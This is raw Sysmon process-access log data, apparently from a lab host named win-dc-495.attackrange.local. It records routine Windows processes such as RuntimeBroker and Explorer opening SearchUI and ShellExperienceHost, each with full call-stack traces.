13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+